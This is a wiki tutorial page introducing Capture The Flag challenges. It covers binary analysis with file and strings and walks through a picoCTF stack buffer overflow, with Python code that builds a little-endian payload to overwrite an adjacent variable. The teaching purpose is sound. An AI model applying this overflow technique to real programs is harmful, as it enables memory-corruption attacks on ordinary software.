Difference between revisions of "Capture The Flag 101"

From ICO wiki

Revision as of 17:56, 3 May 2021

This wiki page will help you better understand the basics of CTFs.

What is Capture the Flag?

Types of challenges

Binary Analysis

What is "Binary Analysis"?

In everyday usage, "binary" can mean the base-2 number system or any non-text data. In "binary analysis", the word has a narrower meaning: a data file in an executable format, such as Windows PE (EXE files) or Linux ELF. For a more familiar picture, think of software you launch by double-clicking, such as a calculator or an email client; these are binaries too. CTFs frequently ask you to analyze such binaries: you are given an unknown binary file and must work out how it behaves, using whatever methods you can.

To get a feel for what binary analysis involves, suppose you were handed an unknown program and asked to analyze its behavior. Most people would first try running it and, if the source code were available, would then read it. Binary analysis follows the same basic procedure: run the program to get a rough idea of how it works, then read the code for the parts you want to understand in more detail. There are two differences. First, rather than only running the program, we use various tools and techniques to extract more information from it. Second, because source code is unavailable in most cases, we read the code in a different form.

Since a binary is really just an executable program, the first step is to run it. Running it normally reveals little beyond its standard input and output, so specialized tools are used to obtain more information. And just as we read source code to understand a program's behavior, we also read code during binary analysis. Because the binary has already been compiled, however, what you read is not the source code but the assembly code produced by a process called "disassembly". Disassembly converts machine language code into assembly language, which is easier for humans to interpret. Many people think that reading assembly is difficult, but in fact it is not so different from reading source code.

The Significance of Analyzing Binaries

What is the significance of analyzing binaries? Winning the CTF, of course, but since a CTF is an information security competition, binary analysis should also be useful for information security itself. From the security point of view, it is most useful for malware analysis: many of the dynamic and static analysis techniques used in CTF binary problems are the same ones that malware analysis requires. If you are skilled at binary analysis in CTFs, you can therefore become a malware analyst relatively easily, as long as you also acquire the knowledge specific to malware. Binary analysis is also used in vulnerability assessment, where you analyze software to find vulnerabilities.

Outside security, binary analysis can help with debugging software you have developed yourself, or with maintaining software that has been neglected since it was created and whose usage is no longer known.

As you can see, binary analysis has uses well beyond enjoying CTFs. It may be a little difficult to learn, but I think it is worth the effort, and there are plenty of places where it can be applied. If you learn binary analysis through CTFs with the help of this page and make use of it in your own activities, I will be more than happy.

Binary Problems in CTF

Binary problems are among the most common challenge types and appear in almost every CTF. They often make up a relatively large share of the questions or carry high scores, so binary analysis can be considered one of the core areas of CTF. There is also a challenge area called PWN, which focuses on exploiting vulnerabilities, and binary analysis skills are important there as well.

What exactly do binary problems in a CTF look like? All of them involve analyzing a binary and understanding its behavior, but they take many forms. In the simplest case, you work out what the program does and provide input that satisfies certain conditions. In other cases, you recover an obfuscated FLAG. Some problems are games that reward you with a FLAG for playing, although it is becoming harder to win by playing alone, and most require you to make good use of your analysis results. Other problems give you a binary that cannot be executed, so you have to predict the result of running it by static analysis. Many more types exist than can be described here.

The name of this category also varies between CTFs. Some use the term "Binary" directly, while others use "Reversing" or "Reverse Engineering".

Sample Problem

File and String Commands

Let's take a file whose format is unknown and check the output of the file command on it.

Image1 file.png

Running the file command gives the output shown above. Let's interpret the result. First, the "PE32 executable" part indicates the format of the executable file. PE is the executable file format used on Windows. The "Intel 80386 MS Windows" part indicates the target CPU architecture and OS: i386 and Windows, respectively.
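As a rough illustration of how a tool like file can tell executable formats apart, the sketch below checks the magic bytes at the start of the data. The function name identify_executable is made up for this page, and the real file command relies on a much larger signature database, so treat this as a minimal approximation rather than a reimplementation.

```python
import struct


def identify_executable(data: bytes) -> str:
    """Guess an executable format from the leading bytes of a file.

    Hypothetical helper for illustration; it only knows ELF and PE.
    """
    # ELF files start with the four bytes 0x7f 'E' 'L' 'F'.
    if data[:4] == b"\x7fELF":
        return "ELF"
    # PE files start with a DOS header ("MZ"). The 4-byte little-endian
    # field at offset 0x3C points to the "PE\0\0" signature.
    if data[:2] == b"MZ" and len(data) >= 0x40:
        (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
        if data[pe_offset:pe_offset + 4] == b"PE\x00\x00":
            return "PE"
        return "MZ"  # DOS-style header without a PE signature
    return "unknown"
```

To try it on a real file, read the first few kilobytes in binary mode (for example with open(path, "rb")) and pass the bytes to the function.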

Extracting strings can also tell you more about the binary being analyzed. In very easy beginner CTF problems, the strings extracted from the file may contain the FLAG as is. Strings can also serve as hints: for example, if you see "Correct!" or "Wrong...", you can guess that a right/wrong check leading to the FLAG is somewhere nearby. As an example, let's use the strings command on the problem "Can you read?", which was asked in CTF for Beginners.

Image2 string.png

Most of the extracted strings are meaningless because the file is an image. We know in advance that all flags have the form ctf4b{FLAG}, so let's use the grep command to extract the string starting with "ctf4b".

Image3 string grep.png

We've found the flag!
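The strings and grep steps above can be approximated in a few lines of Python. This is only a sketch: the function names are hypothetical, the minimum length of 4 mirrors the usual default of strings, and the sample bytes and the flag inside them are invented for the example.

```python
import re


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Return runs of printable ASCII at least min_len characters long."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.decode("ascii") for match in pattern.findall(data)]


def find_flags(data: bytes, prefix: str = "ctf4b") -> list:
    """Keep only the extracted strings that contain the flag prefix."""
    return [s for s in extract_strings(data) if prefix in s]


# Invented sample: binary junk with two readable strings embedded in it.
sample = b"\x89PNG\x00\x01ab\x00ctf4b{example_flag}\xff\xfeCorrect!\x00"
print(extract_strings(sample))
print(find_flags(sample))
```

Short runs such as "PNG" and "ab" are dropped because they are below the minimum length, which is also why strings output on an image file is mostly noise.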

PWN

What is PWN?

Origin and Meaning of PWN

The word "pwn" originated as a mistyping of "own" by a player in an online game, and became slang meaning "to win" or "to beat". In CTFs, challenges in which you gain privileges on a server by exploiting a program are called "pwn" or "pwnable".

PWN

PWN is one of the genres of CTF challenges. You exploit a vulnerability in a program to access and manipulate memory areas that are not normally accessible, and thereby obtain the flag.
The genre is also known as "Exploit". Typically, you connect via ssh or nc to a server where the vulnerable program is stored or running, and attack it.
Since we cannot provide such a server this time, the source code of the target program is shown here instead.
You can compile it locally and try it yourself.
Incidentally, Pwn challenges often provide the source code of the vulnerable program.

Tool

Since Pwn is an extension of binary analysis, the tools used in binary analysis are useful here as well. GDB is a debugger, and probably the best known one. With GDB you can inspect global variables and functions together with their addresses, and when a program hits a segmentation fault or an overflow you can get more information than by running it normally. These features are very useful for pwn, so I will use GDB when solving the problem in this article.

Sample Problem

This time, I'm using a problem from PicoCTF, a CTF that is always available. PicoCTF is designed for beginners and is a great place to learn. If you want to try a CTF, you should definitely give it a go.

The source code for the problem looks like this:

Image4 c.png

From the source, we can see that the problem is solved when the value of secret is 0xc0deface.
However, the value of secret is 0.
Moreover, there is no code that changes it.
So how do we change it? As the name of the problem implies, we cause an overflow.
Line 8 calls strcpy, which writes past the end of buf when the input is larger than buf.
Let's actually give it an input of 16 bytes or more.

Image5 oevrflow1.png

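It is convenient to generate the command-line argument with a scripting language such as Python.
With one byte more than fits in buf, the value of secret changes from 0 to 41.
41 is the hexadecimal ASCII code for 'A'.
From this we can infer that the 4-byte secret variable sits immediately after buf in memory.
Local variables are typically placed next to each other in the stack area of memory, although the exact order depends on the compiler and its options. So, starting from the 17th byte, let's write the value we want secret to hold. On a little-endian CPU such as x86, the bytes of 0xc0deface are supplied in reverse order: ce fa de c0.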

Image6 overflow2.png

We have successfully obtained the flag!
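The reasoning in this walkthrough can be checked with a small model in Python. The sketch below makes several assumptions that the page does not confirm: buf is 16 bytes, secret is a 4-byte little-endian integer placed directly after buf, and secret starts at 0. The function names are hypothetical, and the model imitates strcpy rather than running the real program.

```python
import struct

BUF_SIZE = 16        # assumed size of buf
TARGET = 0xC0DEFACE  # value secret must hold to solve the problem


def build_payload(buf_size: int = BUF_SIZE, target: int = TARGET) -> bytes:
    """Fill buf with 'A', then append the target value in little-endian order."""
    return b"A" * buf_size + struct.pack("<I", target)


def simulate_strcpy(payload: bytes, buf_size: int = BUF_SIZE) -> int:
    """Copy payload into a model of buf + secret and return the new secret."""
    frame = bytearray(buf_size + 4)  # buf followed by secret, all zero
    # strcpy copies up to the first NUL byte, then writes a terminating NUL.
    end = payload.find(b"\x00")
    copied = (payload if end == -1 else payload[:end]) + b"\x00"
    copied = copied[:len(frame)]     # the model tracks only buf and secret
    frame[:len(copied)] = copied
    return struct.unpack_from("<I", frame, buf_size)[0]


print(hex(simulate_strcpy(b"A" * 16)))         # fits in buf: secret stays 0
print(hex(simulate_strcpy(b"A" * 17)))         # one extra byte: 0x41
print(hex(simulate_strcpy(build_payload())))   # full payload: 0xc0deface
```

The payload contains no NUL bytes, which matters because strcpy would stop copying at the first one. Generating the bytes with struct.pack avoids getting the byte order wrong by hand.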

Network

Steganography

Steganography is the art of hiding information in ways that prevent the detection of hidden messages. It includes a vast array of secret communications methods that conceal the message's very existence. These methods include invisible inks, microdots, character arrangement, digital signatures, covert channels, and spread spectrum communications. [1]

Web

SQL Injections

Conclusion

References

  1. IEEE (1998). Available at: https://ieeexplore.ieee.org/abstract/document/4655281 (Accessed 01-05-2021)

  2. Enjoy PWN [Japanese]. Available at: https://gist.github.com/matsubara0507/72dc50c89200a09f7c61

  3. Binary Code Analysis by White Hat Security. Available at: https://www.whitehatsec.com/glossary/content/binary-code-analysis

  4. Binary Code Analysis by Contrast Security. Available at: https://www.contrastsecurity.com/knowledge-hub/glossary/binary-code-analysis